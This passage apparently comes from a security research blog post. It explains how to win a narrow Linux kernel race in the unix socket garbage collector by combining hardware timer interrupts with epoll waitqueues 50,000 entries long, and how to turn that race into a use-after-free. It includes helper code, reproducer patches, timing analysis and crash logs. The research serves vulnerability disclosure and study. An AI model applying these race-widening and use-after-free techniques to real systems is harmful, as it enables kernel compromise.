However, on both X86 and arm64, even though the clockevent subsystem is theoretically able to give absolute timestamps to clockevent drivers (via ->set_next_ktime()), the drivers instead only implement ->set_next_event(), which takes a relative time as argument. This means that the absolute timestamp has to be converted into a relative one, only to be converted back to absolute a short moment later. The delay between those two operations is essentially added to the timer's expiration time.

Luckily this didn't really seem to be a problem for me; if it was, I would have tried to repeatedly call timerfd_settime() shortly before the planned expiry time to ensure that the last time the hardware timer is programmed, the relevant code path is hot in the caches. (I did do some experimentation on arm64, where this seemed to maybe help a tiny bit, but I didn't really analyze it properly.)

A really big list of things to do

Okay, so all the stuff I said above would be helpful on an Android phone with CONFIG_PREEMPT, but what if we're trying to target a normal desktop/server kernel that doesn't have that turned on?

Well, we can still trigger hrtimer interrupts the same way - we just can't use them to immediately enter the scheduler and preempt the thread anymore. But instead of using the interrupt for preemption, we could just try to make the interrupt handler run for a really long time.

Linux has the concept of a "timerfd", which is a file descriptor that refers to a timer. You can e.g. call read() on a timerfd, and that operation will block until the timer has expired. Or you can monitor the timerfd using epoll, and it will show up as readable when the timer expires.

When a timerfd becomes ready, all the timerfd's waiters (including epoll watches), which are queued up in a linked list, are woken up via the wake_up() path - just like when e.g. a pipe becomes readable. Therefore, if we can make the list of waiters really long, the interrupt handler will have to spend a lot of time iterating over that list.

And for any waitqueue that is wired up to a file descriptor, it is fairly easy to add a ton of entries thanks to epoll. Epoll ties its watches to specific FD numbers, so if you duplicate an FD with hundreds of dup() calls, you can then use a single epoll instance to install hundreds of waiters on the file. Additionally, a single process can have lots of epoll instances. I used 500 epoll instances and 100 duplicate FDs, resulting in 50 000 waitqueue items.
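The multiplication of waiters can be sketched as follows. This is an illustration under assumptions rather than the reproducer's code: install_waiters() is a made-up name, error handling is minimal, and reaching 500 x 100 entries would also require a sufficiently high open-file limit.

```c
#include <assert.h>
#include <sys/epoll.h>
#include <unistd.h>

/* Duplicate `target_fd` n_dup times and watch every duplicate from each of
 * n_epoll epoll instances. Each (epoll instance, FD number) pair adds one
 * entry to the target file's waitqueue. The created FDs are stored in the
 * caller-provided arrays. Returns the number of watches, or -1 on error. */
static int install_waiters(int target_fd, int n_epoll, int n_dup,
                           int *epfds_out, int *dupfds_out)
{
    assert(n_epoll > 0 && n_dup > 0);
    int watches = 0;

    for (int i = 0; i < n_dup; i++) {
        dupfds_out[i] = dup(target_fd);
        if (dupfds_out[i] < 0)
            return -1;
    }

    for (int e = 0; e < n_epoll; e++) {
        epfds_out[e] = epoll_create1(0);
        if (epfds_out[e] < 0)
            return -1;
        for (int i = 0; i < n_dup; i++) {
            struct epoll_event ev = { .events = EPOLLIN };
            ev.data.fd = dupfds_out[i];
            if (epoll_ctl(epfds_out[e], EPOLL_CTL_ADD, dupfds_out[i], &ev) < 0)
                return -1;
            watches++;
        }
    }
    return watches;
}
```

With target_fd being the timerfd, n_epoll = 500 and n_dup = 100, this would yield the 50 000 waitqueue items mentioned above; the wakeup then has to walk all of them when the timer fires.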

Measuring race outcomes

A nice aspect of this race condition is that if you only hit the difficult race (close() the FD and run unix_gc() while dup() is preempted between FD table lookup and refcount increment), no memory corruption happens yet, but you can observe that the GC has incorrectly removed a socket buffer (SKB) from the victim socket. Even better, if the race fails, you can also see in which direction it failed, as long as no FDs below the victim FD are unused:

  • If dup() returns -1, it was called too late / the interrupt happened too soon: The file* was already gone from the FD table when __fget_files() tried to load it.
  • If dup() returns a file descriptor:
      • If it returns an FD higher than the victim FD, this implies that the victim FD was only closed after dup() had already elevated the refcount and allocated a new FD. This means dup() was called too soon / the interrupt happened too late.
      • If it returns the old victim FD number:
          • If recvmsg() on the FD returned by dup() returns no data, it means the race succeeded: The GC wrongly removed the queued SKB.
          • If recvmsg() returns data, the interrupt happened between the refcount increment and the allocation of a new FD. dup() was called a little bit too soon / the interrupt happened a little bit too late.
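The decision tree above maps directly onto a small classifier. The enum and function names below are hypothetical, chosen only to make the cases explicit; the sketch assumes, as stated above, that no FD numbers below the victim FD are unused.

```c
#include <assert.h>
#include <stdbool.h>

enum race_outcome {
    DUP_TOO_LATE,           /* interrupt happened too soon */
    DUP_TOO_EARLY,          /* interrupt happened too late */
    DUP_SLIGHTLY_TOO_EARLY, /* interrupt fell between refcount bump and FD allocation */
    RACE_SUCCESS,           /* GC wrongly removed the queued SKB */
    OUTCOME_UNEXPECTED      /* precondition violated (free FD below victim) */
};

/* Classify one race attempt.
 *   dup_ret:       return value of dup(victim_fd)
 *   victim_fd:     FD number that was closed during the attempt
 *   recv_got_data: whether recvmsg() on dup_ret returned queued data
 *                  (only meaningful when dup_ret == victim_fd) */
static enum race_outcome classify_attempt(int dup_ret, int victim_fd,
                                          bool recv_got_data)
{
    assert(victim_fd >= 0);

    if (dup_ret == -1)
        return DUP_TOO_LATE;
    if (dup_ret > victim_fd)
        return DUP_TOO_EARLY;
    if (dup_ret == victim_fd)
        return recv_got_data ? DUP_SLIGHTLY_TOO_EARLY : RACE_SUCCESS;
    return OUTCOME_UNEXPECTED;
}
```

Counting these outcomes per timing offset gives exactly the kind of histogram data that can be plotted to tune the timing.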

Based on this, I repeatedly tested different timing offsets, using a spinloop with a variable number of iterations to skew the timing, and plotted what outcomes the race attempts had depending on the timing skew.

Results: Debian kernel, on Tiger Lake

I tested this on a Tiger Lake laptop, with the same kernel as shown in the disassembly. Note that "0" on the X axis is offset -300 ns relative to the timer's programmed expiry.

This graph shows histograms of race attempt outcomes (too early, success, or too late), with the timing offset at which the outcome occurred on the X axis. The graph shows that depending on the timing offset, up to around 1/3 of race attempts succeeded.

Results: Other kernel, on Skylake

This graph shows similar histograms for a Skylake processor. The exact distribution is different, but again, depending on the timing offset, around 1/3 of race attempts succeeded.

These measurements are from an older laptop with a Skylake CPU, running a different kernel. Here "0" on the X axis is offset -1 us relative to the timer. (These timings are from a system that's running a different kernel from the one shown above, but I don't think that makes a difference.)

The exact timings of course look different between CPUs, and they probably also change based on CPU frequency scaling? But still, if you know what the right timing is (or measure the machine's timing before attempting to actually exploit the bug), you could hit this narrow race with a success rate of about 30%!

How important is the cache miss?

The previous section showed that with the right timing, the race succeeds with a probability around 30% - but it doesn't show whether the cache miss is actually important for that, or whether the race would still work fine without it. To verify that, I patched my test code to try to make the file's cache line hot (present in the cache) instead of cold (not present in the cache):

@@ -312,8 +312,10 @@
     }
 
+#if 0
     // bounce socket's file refcount over to other cpu
     pin_to(2);
     close(SYSCHK(dup(RESURRECT_FD+1-1)));
     pin_to(1);
+#endif
 
     //printf("setting timer\n");
@@ -352,5 +354,5 @@
     close(loop_root);
     while (ts_is_in_future(spin_stop))
-      close(SYSCHK(dup(FAKE_RESURRECT_FD)));
+      close(SYSCHK(dup(RESURRECT_FD)));
     while (ts_is_in_future(my_launch_ts)) /*spin*/;

With that patch, the race outcomes look like this on the Tiger Lake laptop:

This graph is a histogram of race outcomes depending on timing offset; it looks similar to the previous graphs, except that almost no race attempts succeed anymore.

But wait, those graphs make no sense!

If you've been paying attention, you may have noticed that the timing graphs I've been showing are really weird. If we were deterministically hitting the race in exactly the same way every time, the timing graph should look like this (looking just at the "too-early" and "too-late" cases for simplicity):

A sketch of a histogram of race outcomes where the "too early" outcome suddenly drops from 100% probability to 0% probability, and a bit afterwards, the "too late" outcome jumps from 0% probability to 100%

Sure, maybe there is some microarchitectural state that is different between runs and causes timing variations (cache state, branch predictor state, frequency scaling, or something along those lines), but a small number of discrete events that haven't been accounted for should be adding steps to the graph. (If you're mathematically inclined, you can model that as the result of a convolution of the ideal timing graph with the timing delay distributions of individual discrete events.) For two unaccounted events, that might look like this:

A sketch of a histogram of race outcomes where the "too early" outcome drops from 100% probability to 0% probability in multiple discrete steps, and overlapping that, the "too late" outcome goes up from 0% probability to 100% in multiple discrete steps
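The staircase can be reproduced with a toy model. In this sketch (all names and numbers are illustrative assumptions, not measurements), the ideal outcome is a step function of the timing offset, and the unaccounted events are summarised as a discrete distribution of extra delay; convolving the two amounts to summing the probability of every delay that still leaves the attempt on the "too early" side.

```c
#include <assert.h>
#include <stddef.h>

/* One possible total extra delay and the probability that it occurs. */
struct delay_bucket {
    double delay;
    double probability;
};

/* Probability that an attempt launched at `offset` is "too early", i.e.
 * that offset plus the random extra delay still lands before
 * `window_start`. `dist` must describe a distribution summing to 1. */
static double p_too_early(double offset, double window_start,
                          const struct delay_bucket *dist, size_t n)
{
    assert(dist != NULL && n > 0);
    double p = 0.0;
    for (size_t i = 0; i < n; i++) {
        if (offset + dist[i].delay < window_start)
            p += dist[i].probability;
    }
    return p;
}
```

For two independent events that each add 10 time units with probability 1/2, the total delay is 0, 10 or 20 with probabilities 0.25, 0.5 and 0.25, so the "too early" share drops from 1 to 0.75 to 0.25 to 0 in discrete steps as the offset increases, rather than along a straight line.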

But what the graphs are showing is more of a smooth, linear transition, like this:

A sketch of a histogram of race outcomes where the "too early" outcome's share linearly drops while the "too late" outcome's share linearly rises

And that seems to me like there's still something fundamentally wrong. Sure, if there was a sufficiently large number of discrete events mixed together, the curve would eventually just look like a smooth smear - but it seems unlikely to me that there is such a large number of somewhat-evenly distributed random discrete events. And sure, we do get a small amount of timing inaccuracy from sampling the clock in a spinloop, but that should be bounded to the execution time of that spinloop, and the timing smear is far too big for that.

So it looks like there is a source of randomness that isn't a discrete event, but something that introduces a random amount of timing delay within some window. So I became suspicious of the hardware timer. The kernel is using MSR_IA32_TSC_DEADLINE, and the Intel SDM tells us that that thing is programmed with a TSC value, which makes it look as if the timer has very high granularity. But MSR_IA32_TSC_DEADLINE is a newer mode of the LAPIC timer, and the older LAPIC timer modes were instead programmed in units of the APIC timer frequency. According to the Intel SDM, Volume 3A, section 10.5.4 "APIC Timer", that is "the processor’s bus clock or core crystal clock frequency (when TSC/core crystal clock ratio is enumerated in CPUID leaf 0x15) divided by the value specified in the divide configuration register". This frequency is significantly lower than the TSC frequency. So perhaps MSR_IA32_TSC_DEADLINE is actually just a front-end to the same old APIC timer?

I tried to measure the difference between the programmed TSC value and when execution was actually interrupted (not when the interrupt handler starts running, but when the old execution context is interrupted - you can measure that if the interrupted execution context is just running RDTSC in a loop); that looks as follows:

A graph showing noise. Delays from deadline TSC to last successful TSC read before interrupt look essentially random, in the range from around -130 to around 10.

As you can see, the expiry of the hardware timer indeed adds a bunch of noise. The size of the timing spread is also very close to one period of the core crystal clock, measured in TSC ticks - the TSC/core crystal clock ratio on this machine is 117. So I tried plotting the absolute TSC values at which execution was interrupted, modulo the TSC / core crystal clock ratio, and got this:

A graph showing a clear grouping around 0, roughly in the range -20 to 10, with some noise scattered over the rest of the graph.

This confirms that MSR_IA32_TSC_DEADLINE is (apparently) an interface that internally converts the specified TSC value into less granular bus clock / core crystal clock time, at least on some Intel CPUs.

But there's still something really weird here: The TSC values at which execution seems to be interrupted were at negative offsets relative to the programmed expiry time, as if the timeouts were rounded down to the less granular clock, or something along those lines. To get a better idea of how timer interrupts work, I measured on yet another system (an old Haswell CPU) with a patched kernel when execution is interrupted and when the interrupt handler starts executing relative to the programmed expiry time (and also plotted the difference between the two):

A graph showing that the skid from programmed interrupt time to execution interruption is around -100 to -30 cycles, the skid to interrupt entry is around 360 to 420 cycles, and the time from execution interruption to interrupt entry has much less timing variance and is at around 440 cycles.

So it looks like the CPU starts handling timer interrupts a little bit before the programmed expiry time, but interrupt handler entry takes so long (~450 TSC clock cycles?) that by the time the CPU starts executing the interrupt handler, the timer expiry time has long passed.

Anyway, the important bit for us is that when the CPU interrupts execution due to timer expiry, it's always at a LAPIC timer edge; and LAPIC timer edges happen when the TSC value is a multiple of the TSC/LAPIC clock ratio. An exploit that doesn't take that into account and wrongly assumes that MSR_IA32_TSC_DEADLINE has TSC granularity will have its timing smeared by one LAPIC clock period, which can be something like 40ns.

The ~30% accuracy we could achieve with the existing PoC with the right timing is already not terrible; but if we control for the timer's weirdness, can we do better?

The problem is that we are effectively launching the race with two timers that behave differently: One timer based on calling clock_gettime() in a loop (which uses the high-resolution TSC to compute a time), the other a hardware timer based on the lower-resolution LAPIC clock. I see two options to fix this:

  1. Try to ensure that the second timer is set at the start of a LAPIC clock period - that way, the second timer should hopefully behave exactly like the first (or have an additional fixed offset, but we can compensate for that).
  2. Shift the first timer's expiry time down according to the distance from the second timer to the previous LAPIC clock period.
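Both options boil down to simple modular arithmetic if one assumes, as the measurements above suggest, that LAPIC timer edges fall on TSC values that are multiples of the TSC/LAPIC clock ratio and that expiry is effectively rounded down to such an edge. The helper names below are hypothetical and the model ignores any additional fixed offset.

```c
#include <assert.h>
#include <stdint.h>

/* Distance (in TSC ticks) from a programmed TSC deadline back to the
 * latest LAPIC timer edge at or before it. */
static uint64_t ticks_since_lapic_edge(uint64_t tsc_deadline, uint64_t ratio)
{
    assert(ratio != 0);
    return tsc_deadline % ratio;
}

/* Option 1: move the hardware timer's deadline onto a LAPIC edge, so that
 * the interrupt is expected at the programmed TSC value itself. */
static uint64_t align_deadline_to_edge(uint64_t tsc_deadline, uint64_t ratio)
{
    return tsc_deadline - ticks_since_lapic_edge(tsc_deadline, ratio);
}

/* Option 2: leave the hardware timer alone and instead shift the spinloop's
 * launch time down by the same distance the hardware will round away. */
static uint64_t shift_spin_deadline(uint64_t spin_tsc, uint64_t timer_tsc,
                                    uint64_t ratio)
{
    return spin_tsc - ticks_since_lapic_edge(timer_tsc, ratio);
}
```

For example, with a ratio of 117, a deadline of TSC value 1000 lies 64 ticks after the edge at 936; option 1 would program 936 directly, while option 2 would launch the spinloop side 64 ticks earlier.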

(One annoyance with this is that while we can grab information on how wall/monotonic time is calculated from TSC from the vvar mapping used by the vDSO, the clock is subject to minuscule additional corrections at every clock tick, which occur every 4ms on standard distro kernels (with CONFIG_HZ=250) as long as any core is running.)

I tried to see whether the timing graph would look nicer if I accounted for this LAPIC clock rounding and also used a custom kernel to cheat and control for possible skid introduced by the absolute-to-relative-and-back conversion of the expiry time (see further up), but that still didn't help all that much.

(No) surprise: clock speed matters

Something I should've thought about way earlier is that of course, clock speed matters. On newer Intel CPUs with P-states, the CPU is normally in control of its own frequency, and dynamically adjusts it as it sees fit; the OS just provides some hints.

Linux has an interface that claims to tell you the "current frequency" of each CPU core in /sys/devices/system/cpu/cpufreq/policy<n>/scaling_cur_freq, but when I tried using that, I got a different "frequency" every time I read that file, which seemed suspicious.

Looking at the implementation, it turns out that the value shown there is calculated in arch_freq_get_on_cpu() and its callees - the value is calculated on demand when the file is read, with results cached for around 10 milliseconds. The value is determined as the ratio between the deltas of MSR_IA32_APERF and MSR_IA32_MPERF between the last read and the current one. So if you have some tool that is polling these values every few seconds and wants to show average clock frequency over that time, it's probably a good way of doing things; but if you actually want the current clock frequency, it's not a good fit.
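The underlying arithmetic is straightforward: MPERF counts at a fixed reference rate while APERF counts at the rate the core actually ran, so the ratio of their deltas scales a known base frequency. The function below is a userspace sketch of that calculation, not the kernel's implementation; effective_khz() and its parameters are illustrative names.

```c
#include <assert.h>
#include <stdint.h>

/* Average effective frequency (in kHz) over the interval between two
 * samples of the APERF and MPERF counters.
 *   base_khz: frequency at which MPERF counts
 * Returns 0 if MPERF did not advance. The multiplication can overflow
 * for very long intervals; short sampling windows avoid that. */
static uint64_t effective_khz(uint64_t base_khz,
                              uint64_t aperf_before, uint64_t aperf_after,
                              uint64_t mperf_before, uint64_t mperf_after)
{
    uint64_t aperf_delta = aperf_after - aperf_before;
    uint64_t mperf_delta = mperf_after - mperf_before;

    if (mperf_delta == 0)
        return 0;
    return base_khz * aperf_delta / mperf_delta;
}
```

Because the result is an average over the sampling interval, taking the two samples in quick succession gives a value much closer to the instantaneous frequency than samples taken seconds apart.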

I hacked a helper into my kernel that samples both MSRs twice in quick succession, and that gives much cleaner results. When I measure the clock speeds and timing offsets at which the race succeeds, the result looks like this (showing just two clock speeds; the Y axis is the number of race successes at the clock offset specified on the X axis and the frequency scaling specified by the color):

A graph showing that the timing of successful race attempts depends on the CPU's performance setting - at 11/28 performance, most successful race attempts occur around clock offset -1200 (in TSC units), while at 14/28 performance, most successful race attempts occur around clock offset -1000.

So clearly, dynamic frequency scaling has a huge impact on the timing of the race - I guess that's to be expected, really.

But even accounting for all this, the graph still looks kind of smooth, so clearly there is still something more that I'm missing - oh well. I decided to stop experimenting with the race's timing at this point, since I didn't want to sink too much time into it. (Or perhaps I actually just stopped because I got distracted by newer and shinier things?)

Causing a UAF

Anyway, I could probably spend much more time trying to investigate the timing variations (and probably mostly bang my head against a wall, because execution timing is really difficult to understand in detail, and understanding it completely might require using something like Gamozo Labs' "Sushi Roll" and then going through every single instruction and comparing the observations to the internal architecture of the CPU). Let's not do that, and get back to how to actually exploit this bug!

To turn this bug into memory corruption, we have to abuse the fact that the recvmsg() path assumes that SKBs on the receive queue are protected from deletion by the socket mutex, while the GC actually deletes SKBs from the receive queue without touching the socket mutex. For that purpose, while the unix GC is running, we have to start a recvmsg() call that looks up the victim SKB, block until the unix GC has freed the SKB, and then let recvmsg() continue operating on the freed SKB. This is fairly straightforward - while it is a race, we can easily slow down unix_gc() for multiple milliseconds by creating lots of sockets that are not directly referenced from the FD table and have many tiny SKBs queued up. Here's a graph showing the unix GC execution time on my laptop, depending on the number of queued SKBs that the GC has to scan through:

A graph showing the time spent per GC run depending on the number of queued SKBs. The relationship is roughly linear.

To turn this into a UAF, it's also necessary to get past the following check near the end of unix_gc():

        /* All candidates should have been detached by now. */
        BUG_ON(!list_empty(&gc_candidates));

gc_candidates is a list that previously contained all sockets that were deemed to be unreachable by the GC. Then, the GC attempted to free all those sockets by eliminating their mutual references. If we manage to keep a reference to one of the sockets that the GC thought was going away, the GC detects that with the BUG_ON().

But we don't actually need the victim SKB to reference a socket that the GC thinks is going away; in scan_inflight(), the GC targets any SKB with a socket that is marked UNIX_GC_CANDIDATE, meaning it just had to be a candidate for being scanned by the GC. So by making the victim SKB hold a reference to a socket that is not directly referenced from a file descriptor table, but is indirectly referenced by a file descriptor table through another socket, we can ensure that the BUG_ON() won't trigger.

I extended my reproducer with this trick and some userfaultfd trickery to make recv() run with the right timing. Nowadays you don't necessarily get full access to userfaultfd as a normal user, but since I'm just trying to show the concept, and there are alternatives to userfaultfd (using FUSE or just slow disk access), that's good enough for this blogpost.

On a normal distro kernel with default settings, the reproducer's UAF accesses won't actually be noticeable; but if you add the kernel command line flag slub_debug=FP (to enable SLUB's poisoning and sanity checks), the reproducer quickly crashes twice, first with a poison dereference and then with a poison overwrite detection, showing that one byte of the poison was incremented:

general protection fault, probably for non-canonical address 0x6b6b6b6b6b6b6b6b: 0000 [#1] SMP NOPTI

CPU: 1 PID: 2655 Comm: hardirq_loop Not tainted 5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Call Trace:

[...]

 unix_stream_recvmsg+0x53/0x70

[...]

 __sys_recvfrom+0x166/0x180

[...]

 __x64_sys_recvfrom+0x25/0x30

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

---[ end trace 39a81eb3a52e239c ]---

=============================================================================

BUG skbuff_head_cache (Tainted: G      D          ): Poison overwritten

-----------------------------------------------------------------------------

INFO: 0x00000000d7142451-0x00000000d7142451 @offset=68. First byte 0x6c instead of 0x6b

INFO: Slab 0x000000002f95c13c objects=32 used=32 fp=0x0000000000000000 flags=0x17ffffc0010200

INFO: Object 0x00000000ef9c59c8 @offset=0 fp=0x00000000100a3918

Object   00000000ef9c59c8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000097454be8: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000035f1d791: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000af71b907: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000d2d371e: 6b 6b 6b 6b 6c 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkklkkkkkkkkkkk

Object   0000000000744b35: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000794f2935: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006dc06746: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000005fb18682: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000072eb8dd2: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   00000000b5b572a9: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   0000000085d6850b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000006346150b: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b  kkkkkkkkkkkkkkkk

Object   000000000ddd1ced: 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b 6b a5  kkkkkkkkkkkkkkk.

Padding  00000000e00889a7: 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a 5a  ZZZZZZZZZZZZZZZZ

Padding  00000000d190015f: 5a 5a 5a 5a 5a 5a 5a 5a                          ZZZZZZZZ

CPU: 7 PID: 1641 Comm: gnome-shell Tainted: G    B D           5.10.0-9-amd64 #1 Debian 5.10.70-1

[...]

Call Trace:

 dump_stack+0x6b/0x83

 check_bytes_and_report.cold+0x79/0x9a

 check_object+0x217/0x260

[...]

 alloc_debug_processing+0xd5/0x130

 ___slab_alloc+0x511/0x570

[...]

 __slab_alloc+0x1c/0x30

 kmem_cache_alloc_node+0x1f3/0x210

 __alloc_skb+0x46/0x1f0

 alloc_skb_with_frags+0x4d/0x1b0

 sock_alloc_send_pskb+0x1f3/0x220

[...]

 unix_stream_sendmsg+0x268/0x4d0

 sock_sendmsg+0x5e/0x60

 ____sys_sendmsg+0x22e/0x270

[...]

 ___sys_sendmsg+0x75/0xb0

[...]

 __sys_sendmsg+0x59/0xa0

 do_syscall_64+0x33/0x80

 entry_SYSCALL_64_after_hwframe+0x44/0xa9

[...]

FIX skbuff_head_cache: Restoring 0x00000000d7142451-0x00000000d7142451=0x6b

FIX skbuff_head_cache: Marking all objects used

RIP: 0010:unix_stream_read_generic+0x72b/0x870

Code: fe ff ff 31 ff e8 85 87 91 ff e9 a5 fe ff ff 45 01 77 44 8b 83 80 01 00 00 85 c0 0f 89 10 01 00 00 49 8b 47 38 48 85 c0 74 23 <0f> bf 00 66 85 c0 0f 85 20 01 00 00 4c 89 fe 48 8d 7c 24 58 44 89

RSP: 0018:ffffb789027f7cf0 EFLAGS: 00010202

RAX: 6b6b6b6b6b6b6b6b RBX: ffff982d1d897b40 RCX: 0000000000000000

RDX: 6a0fe1820359dce8 RSI: ffffffffa81f9ba0 RDI: 0000000000000246

RBP: ffff982d1d897ea8 R08: 0000000000000000 R09: 0000000000000000

R10: 0000000000000000 R11: ffff982d2645c900 R12: ffffb789027f7dd0

R13: ffff982d1d897c10 R14: 0000000000000001 R15: ffff982d3390e000

FS:  00007f547209d740(0000) GS:ffff98309fa40000(0000) knlGS:0000000000000000

CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033

CR2: 00007f54722cd000 CR3: 00000001b61f4002 CR4: 0000000000770ee0

PKRU: 55555554

Conclusion(s)

Hitting a race can become easier if, instead of racing two threads against each other, you race one thread against a hardware timer to create a gigantic timing window for the other thread. Hence the title! On the other hand, it introduces extra complexity because now you have to think about how timers actually work, and turns out, time is a complicated concept...

This shows how at least some really tight races can still be hit and we should treat them as security bugs, even if it seems like they'd be very hard to hit at first glance.

Also, precisely timing races is hard, and the details of how long it actually takes the CPU to get from one point to another are mysterious. (As not only exploit writers know, but also anyone who's ever wanted to benchmark a performance-relevant change...)

Appendix: How impatient are interrupts?

I did also play around with this stuff on arm64 a bit, and I was wondering: At what points do interrupts actually get delivered? Does an incoming interrupt force the CPU to drop everything immediately, or do inflight operations finish first? This gets particularly interesting on phones that contain two or three different types of CPUs mixed together.

On a Pixel 4 (which has 4 slow in-order cores, 3 fast cores, and 1 faster core), I tried firing an interval timer at 100Hz (using timer_create()), with a signal handler that logs the PC register, while running this loop:

  400680:        91000442         add        x2, x2, #0x1

  400684:        91000421         add        x1, x1, #0x1

  400688:        9ac20820         udiv        x0, x1, x2

  40068c:        91006800         add        x0, x0, #0x1a

  400690:        91000400         add        x0, x0, #0x1

  400694:        91000442         add        x2, x2, #0x1

  400698:        91000421         add        x1, x1, #0x1

  40069c:        91000442         add        x2, x2, #0x1

  4006a0:        91000421         add        x1, x1, #0x1

  4006a4:        9ac20820         udiv        x0, x1, x2

  4006a8:        91006800         add        x0, x0, #0x1a

  4006ac:        91000400         add        x0, x0, #0x1

  4006b0:        91000442         add        x2, x2, #0x1

  4006b4:        91000421         add        x1, x1, #0x1

  4006b8:        91000442         add        x2, x2, #0x1

  4006bc:        91000421         add        x1, x1, #0x1

  4006c0:        17fffff0         b        400680 <main+0xe0>

The logged interrupt PCs had the following distribution on a slow in-order core:

A histogram of PC register values, where most instructions in the loop have roughly equal frequency, the instructions after udiv instructions have twice the frequency, and two other instructions have zero frequency.

and this distribution on a fast out-of-order core:

A histogram of PC register values, where the first instruction of the loop has very high frequency, the following 4 instructions have near-zero frequency, and the following instructions have low frequencies

As always, out-of-order (OOO) cores make everything weird, and the start of the loop seems to somehow "provide cover" for the following instructions; but on the in-order core, we can see that more interrupts arrive after the slow udiv instructions. So apparently, when one of those is executing while an interrupt arrives, it continues executing and doesn't get aborted somehow?

With the following loop, which has an LDR instruction mixed in that accesses a memory location that is constantly being modified by another thread:

  4006a0:        91000442         add        x2, x2, #0x1

  4006a4:        91000421         add        x1, x1, #0x1

  4006a8:        9ac20820         udiv        x0, x1, x2

  4006ac:        91006800         add        x0, x0, #0x1a

  4006b0:        91000400         add        x0, x0, #0x1

  4006b4:        91000442         add        x2, x2, #0x1

  4006b8:        91000421         add        x1, x1, #0x1

  4006bc:        91000442         add        x2, x2, #0x1

  4006c0:        91000421         add        x1, x1, #0x1

  4006c4:        9ac20820         udiv        x0, x1, x2

  4006c8:        91006800         add        x0, x0, #0x1a

  4006cc:        91000400         add        x0, x0, #0x1

  4006d0:        91000442         add        x2, x2, #0x1

  4006d4:        f9400061         ldr        x1, [x3]

  4006d8:        91000421         add        x1, x1, #0x1

  4006dc:        91000442         add        x2, x2, #0x1

  4006e0:        91000421         add        x1, x1, #0x1

  4006e4:        17ffffef         b        4006a0 <main+0x100>

the cache-missing loads obviously have a large influence on the timing. On the in-order core:

A histogram of interrupt instruction pointers, showing that most interrupts are delivered with PC pointing to the instruction after the high-latency load instruction.

On the OOO core:

A similar histogram as the previous one, except that an even larger fraction of interrupt PCs are after the high-latency load instruction.

What is interesting to me here is that the timer interrupts seem to again arrive after the slow load - implying that if an interrupt arrives while a slow memory access is in progress, the interrupt handler may not get to execute until the memory access has finished? (Unless maybe on the OOO core the interrupt handler can start speculating already? I wouldn't really expect that, but could imagine it.)

On an x86 Skylake CPU, we can do a similar test:

    11b8:        48 83 c3 01                  add    $0x1,%rbx

    11bc:        48 83 c0 01                  add    $0x1,%rax

    11c0:        48 01 d8                     add    %rbx,%rax

    11c3:        48 83 c3 01                  add    $0x1,%rbx

    11c7:        48 83 c0 01                  add    $0x1,%rax

    11cb:        48 01 d8                     add    %rbx,%rax

    11ce:        48 03 02                     add    (%rdx),%rax

    11d1:        48 83 c0 01                  add    $0x1,%rax

    11d5:        48 83 c3 01                  add    $0x1,%rbx

    11d9:        48 01 d8                     add    %rbx,%rax

    11dc:        48 83 c3 01                  add    $0x1,%rbx

    11e0:        48 83 c0 01                  add    $0x1,%rax

    11e4:        48 01 d8                     add    %rbx,%rax

    11e7:        eb cf                        jmp    11b8 <main+0xf8>

with a similar result:

A histogram of interrupt instruction pointers, showing that almost all interrupts were delivered with RIP pointing to the instruction after the high-latency load.

This means that if the first access to the file terminated our race window (which is not the case), we probably wouldn't be able to win the race by making the access to the file slow - instead we'd have to slow down one of the operations before that. (But note that I have only tested simple loads, not stores or read-modify-write operations here.)

Reversing embedded device bootloader (U-Boot) - p.2

